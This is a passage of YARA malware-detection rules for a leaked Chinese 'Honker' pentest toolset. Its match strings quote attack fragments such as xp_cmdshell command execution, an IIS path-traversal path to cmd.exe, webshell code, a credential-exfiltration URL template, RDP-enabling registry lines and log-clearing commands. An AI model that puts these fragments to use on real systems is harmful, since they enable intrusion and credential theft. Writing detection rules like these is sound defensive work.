||
|
score = 70
|
||
|
hash = "93bf0f64bec926e9aa2caf4c28df9af27ec0e104"
|
||
|
id = "be8d0dce-4f7f-5f18-9ed0-99fc1dc2b22f"
|
||
|
strings:
|
||
|
$s1 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "http://localhost/1.asp?id=16" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = " exec master.dbo.xp_cmdshell @Z--" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = ";use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamet" wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2600KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_DUBrute_v3_0_RC3_2_0 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file 2.0.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e8ee982421ccff96121ffd24a3d84e3079f3750f"
|
||
|
id = "dda5eea9-da79-5f1f-bbac-9f05ba7e71c9"
|
||
|
strings:
|
||
|
$s0 = "IP - %d; Login - %d; Password - %d; Combination - %d" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Create %d IP@Loginl;Password" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s15 = "UBrute.com" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 980KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_hkmjjiis6 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file hkmjjiis6.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2023-01-27"
|
||
|
score = 70
|
||
|
hash = "4cbc6344c6712fa819683a4bd7b53f78ea4047d7"
|
||
|
id = "badf8224-4f09-57aa-ab16-0d70e0b3f88c"
|
||
|
strings:
|
||
|
$s14 = "* FROM IIsWebInfo/r" fullword ascii
|
||
|
$s19 = "ltithread4ck/" ascii
|
||
|
$s20 = "LookupAcc=Sid#" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 175KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_clearlogs {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file clearlogs.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
modified = "2023-01-27"
|
||
|
score = 70
|
||
|
hash = "490f3bc318f415685d7e32176088001679b0da1b"
|
||
|
id = "bfbc339e-5530-5984-94de-be1002f09ca1"
|
||
|
strings:
|
||
|
$s2 = "- http://ntsecurity.nu/toolbox/clearlogs/" ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Error: Unable to clear log - " fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 140KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_no_net_priv_esc_AddUser {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file AddUser.dll"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "4c95046be6ae40aee69a433e9a47f824598db2d4"
|
||
|
id = "0f99914c-9349-5870-a3e0-3a5079efdecf"
|
||
|
strings:
|
||
|
$s0 = "PECompact2" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "adduser" fullword ascii
|
||
|
$s5 = "OagaBoxA" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 115KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Injection {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Injection.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "3484ed16e6f9e0d603cbc5cb44e46b8b7e775d35"
|
||
|
id = "8600c86f-0da1-5ddb-bae5-69358cf53e7c"
|
||
|
strings:
|
||
|
$s0 = "http://127.0.0.1/6kbbs/bank.asp" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s7 = "jmPost.asp" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 220KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SQLServer_inject_Creaked {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SQLServer_inject_Creaked.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "af3c41756ec8768483a4cf59b2e639994426e2c2"
|
||
|
id = "9a8a77c2-9e06-5694-8055-4480ab932520"
|
||
|
strings:
|
||
|
$s1 = "http://localhost/index.asp?id=2" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "Email:zhaoxypass@yahoo.com.cn<br>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 8110KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_WebScan_WebScan {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file WebScan.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "a0b0e2422e0e9edb1aed6abb5d2e3d156b7c8204"
|
||
|
id = "1545494b-9a74-5b2e-921c-e54dd5ac4b51"
|
||
|
strings:
|
||
|
$s1 = "wwwscan.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "WWWScan Gui" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 700KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetHashes_2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetHashes.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "35ae9ccba8d607d8c19a065cf553070c54b091d8"
|
||
|
id = "31117d2e-caf1-58c9-8525-b40b73097928"
|
||
|
strings:
|
||
|
$s1 = "GetHashes.exe <SAM registry file> [System key file]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "GetHashes.exe $Local" fullword ascii
|
||
|
$s3 = "The system key doesn't match SAM registry file!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and 2 of them
|
||
|
}
|
||
|
|
||
|
rule SUSP_Patcher_Keygen_Indicators_Jun15 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "e32f5de730e324fb386f97b6da9ba500cf3a4f8d"
|
||
|
id = "4dd65e4b-8178-5576-9740-b3c80a8127e2"
|
||
|
strings:
|
||
|
$s0 = "<description>Patch</description>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "\\dup2patcher.dll" ascii
|
||
|
$s3 = "load_patcher" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 4000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Tuoku_script_oracle_2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file oracle.txt"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "865dd591b552787eda18ee0ab604509bae18c197"
|
||
|
id = "b88a0faa-1616-5f1b-80dc-6e6a2f0cb671"
|
||
|
strings:
|
||
|
$s0 = "webshell" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "Silic Group Hacker Army " fullword ascii
|
||
|
condition:
|
||
|
filesize < 3KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_net_packet_capt {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file net_packet_capt.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "2d45a2bd9e74cf14c1d93fff90c2b0665f109c52"
|
||
|
id = "16e19be7-3805-5e2b-baa6-20554fb7a5cf"
|
||
|
strings:
|
||
|
$s1 = "(*.sfd)" fullword ascii
|
||
|
$s2 = "GetLaBA" fullword ascii
|
||
|
$s3 = "GAIsProcessorFeature" fullword ascii /* PEStudio Blacklist: strings */ /* Goodware String - occured 1 times */
|
||
|
$s4 = "- Gablto " ascii
|
||
|
$s5 = "PaneWyedit" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 50KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CleanIISLog {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CleanIISLog.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
|
||
|
id = "3931ba63-faf5-5b44-879c-105cd2812712"
|
||
|
strings:
|
||
|
$s1 = "Usage: CleanIISLog <LogFile>|<.> <CleanIP>|<.>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_HASH_pwhash {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file pwhash.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "689056588f95749f0382d201fac8f58bac393e98"
|
||
|
id = "5d8c3648-a725-5f01-9800-b75b8c740cf1"
|
||
|
strings:
|
||
|
$s1 = "Example: quarks-pwdump.exe --dump-hash-domain --with-history" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "quarks-pwdump.exe <options> <NTDS file>" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 1000KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_cleaner_cl_2 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file cl.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "523084e8975b16e255b56db9af0f9eecf174a2dd"
|
||
|
id = "9aa36c0a-9e0f-5274-bebe-9179d81b05f7"
|
||
|
strings:
|
||
|
$s0 = "cl -eventlog All/Application/System/Security" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "clear iislog error!" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 50KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SqlMap_Python_Run {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Run.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "a51479a1c589f17c77d22f6cf90b97011c33145f"
|
||
|
id = "308d929a-0f38-5db4-92c2-2a7bf25bb64f"
|
||
|
strings:
|
||
|
$s1 = ".\\Run.log" fullword ascii
|
||
|
$s2 = "[root@Hacker~]# Sqlmap " fullword ascii
|
||
|
$s3 = "%sSqlmap %s" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 30KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_SAMInside {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file SAMInside.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "707ba507f9a74d591f4f2e2f165ff9192557d6dd"
|
||
|
id = "c5ac9f0a-d1af-59c3-9c13-91153180f3d8"
|
||
|
strings:
|
||
|
$s0 = "www.InsidePro.com" fullword wide
|
||
|
$s1 = "SAMInside.exe" fullword wide
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 650KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_WebScan_wwwscan {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file wwwscan.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "6dbffa916d0f0be2d34c8415592b9aba690634c7"
|
||
|
id = "defe0024-f94a-560a-a9f6-b3849b41f9bb"
|
||
|
strings:
|
||
|
$s1 = "%s www.target.com -p 8080 -m 10 -t 16" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "GET /nothisexistpage.html HTTP/1.1" fullword ascii
|
||
|
$s3 = "<Usage>: %s <HostName|Ip> [Options]" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 60KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_2_3389 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file 3389.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "48d1974215e5cb07d1faa57e37afa91482b5a376"
|
||
|
id = "8b2f5f6d-4d7b-561c-bd77-2de351e5aca8"
|
||
|
strings:
|
||
|
$s1 = "C:\\Documents and Settings\\Administrator\\" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "net user guest /active:yes" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\Microsoft Word.exe" ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 80KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_PHP_php11 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file php11.txt"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "dcc8226e7eb20e4d4bef9e263c14460a7ee5e030"
|
||
|
id = "e20eaab1-9799-5e61-9a25-3ac0dcce5f7f"
|
||
|
strings:
|
||
|
$s1 = "<tr><td><b><?php if (!$win) {echo wordwrap(myshellexec('id'),90,'<br>',1);} else" ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "foreach (glob($_GET['pathtomass'].\"/*.htm\") as $injectj00) {" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "echo '[cPanel Found] '.$login.':'.$pass.\" Success\\n\";" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
filesize < 800KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_WebCruiserWVS {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file WebCruiserWVS.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "6c90a9ed4c8a141a343dab1b115cc840a7190304"
|
||
|
id = "16bed1e8-a1f0-5fcf-9c03-83625a388547"
|
||
|
strings:
|
||
|
$s0 = "id:uid:user:username:password:access:account:accounts:admin_id:admin_name:admin_" ascii /* PEStudio Blacklist: strings */
|
||
|
$s1 = "Created By WebCruiser - Web Vulnerability Scanner http://sec4app.com" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 700KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Hookmsgina {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Hookmsgina.dll"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "f4d9b329b45fbcf6a3b9f29f2633d5d3d76c9f9d"
|
||
|
id = "77813637-ec9f-599c-90c9-be1dd93b45f7"
|
||
|
strings:
|
||
|
$s1 = "\\\\.\\pipe\\WinlogonHack" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "%s?host=%s&domain=%s&user=%s&pass=%s&port=%u" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Global\\WinlogonHack_Load%u" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Hookmsgina.dll" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_sig_3389_xp3389 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file xp3389.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d776eb7596803b5b94098334657667d34b60d880"
|
||
|
id = "75d23c63-ba9e-55fd-90fe-5e054d28a777"
|
||
|
strings:
|
||
|
$s1 = "echo \"fdenytsconnections\"=dword:00000000 >> c:\\reg.reg" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s2 = "echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server] >" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "echo \"Tsenabled\"=dword:00000001 >> c:\\reg.reg" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 20KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_CookiesView {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file CookiesView.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "c54e1f16d79066edfa0f84e920ed1f4873958755"
|
||
|
id = "71a43797-4b5b-5f87-a70e-ebabc00d9319"
|
||
|
strings:
|
||
|
$s0 = "V1.0 Http://www.darkst.com Code:New4" fullword ascii
|
||
|
$s1 = "maotpo@126.com" fullword ascii
|
||
|
$s2 = "www.baidu.com" fullword ascii
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 640KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_T00ls_Lpk_Sethc_v4_LPK {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file LPK.DAT"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "2b2ab50753006f62965bba83460e3960ca7e1926"
|
||
|
id = "808f5de2-1360-521e-8939-b759e361507c"
|
||
|
strings:
|
||
|
$s1 = "http://127.0.0.1/1.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "FreeHostKillexe.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "\\sethc.exe /G everyone:F" ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "c:\\1.exe" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and 1 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_ScanHistory {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file ScanHistory.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "14c31e238924ba3abc007dc5a3168b64d7b7de8d"
|
||
|
id = "85585cd2-c5ed-5465-bcac-b61211570055"
|
||
|
strings:
|
||
|
$s1 = "ScanHistory.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = ".\\Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "select * from Results order by scandate desc" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 200KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_InvasionErasor {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file InvasionErasor.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "b37ecd9ee6b137a29c9b9d2801473a521b168794"
|
||
|
id = "03ccb643-9f92-5278-a358-65f56cf19ccc"
|
||
|
strings:
|
||
|
$s1 = "c:\\windows\\system32\\config\\*.*" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "c:\\winnt\\*.txt" fullword wide /* PEStudio Blacklist: os */
|
||
|
$s3 = "Command1" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
$s4 = "Win2003" fullword ascii /* PEStudio Blacklist: os */
|
||
|
$s5 = "Win 2000" fullword ascii /* PEStudio Blacklist: os */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 60KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_super_Injection1 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file super Injection1.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "8ff2df40c461f6c42b92b86095296187f2b59b14"
|
||
|
id = "ad84c5a0-4f03-5040-bdf7-819b40a08ad2"
|
||
|
strings:
|
||
|
$s2 = "Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii /* PEStudio Blacklist: agent */
|
||
|
$s4 = "ScanInject.log" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 2000KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_Pk_Pker {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file Pker.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "631787f27f27c46f79e58e1accfcc9ecfb4d3a2f"
|
||
|
id = "dff0e4fb-6b2e-5fa8-910d-63a9e5030b95"
|
||
|
strings:
|
||
|
$s1 = "/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s2 = "msadc/..\\..\\..\\..\\winnt/system32/cmd.exe" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s3 = "--Made by VerKey&Only_Guest&Bincker" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s4 = ";APPLET;EMBED;FRAMESET;HEAD;NOFRAMES;NOSCRIPT;OBJECT;SCRIPT;STYLE;" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s5 = " --Welcome to Www.Pker.In Made by V.K" fullword wide
|
||
|
$s6 = "Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
$s7 = ".\\Report.dat" fullword wide /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 500KB and 5 of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_GetPass_GetPass {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file GetPass.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "d18d952b24110b83abd17e042f9deee679de6a1a"
|
||
|
id = "999d0ac0-a112-53db-9dbe-10fa4419cfae"
|
||
|
strings:
|
||
|
$s1 = "\\only\\Desktop\\" ascii
|
||
|
$s2 = "To Run As Administuor" ascii /* PEStudio Blacklist: strings */
|
||
|
$s3 = "Key to EXIT ... & pause > nul" fullword ascii /* PEStudio Blacklist: strings */
|
||
|
condition:
|
||
|
uint16(0) == 0x5a4d and filesize < 300KB and all of them
|
||
|
}
|
||
|
|
||
|
rule CN_Honker_F4ck_Team_BlackMoon_Jun15 {
|
||
|
meta:
|
||
|
description = "Sample from CN Honker Pentest Toolset - file f4ck.exe"
|
||
|
license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
|
||
|
author = "Florian Roth (Nextron Systems)"
|
||
|
reference = "Disclosed CN Honker Pentest Toolset"
|
||
|
old_rule_name = "CN_Honker_F4ck_Team_f4ck_3"
|
||
|
date = "2015-06-23"
|
||
|
score = 70
|
||
|
hash = "7e3bf9b26df08cfa10f10e2283c6f21f5a3a0014"
|
||
|
id = "df12daca-8e03-5382-b71d-96a747d3a043"
|
||
|
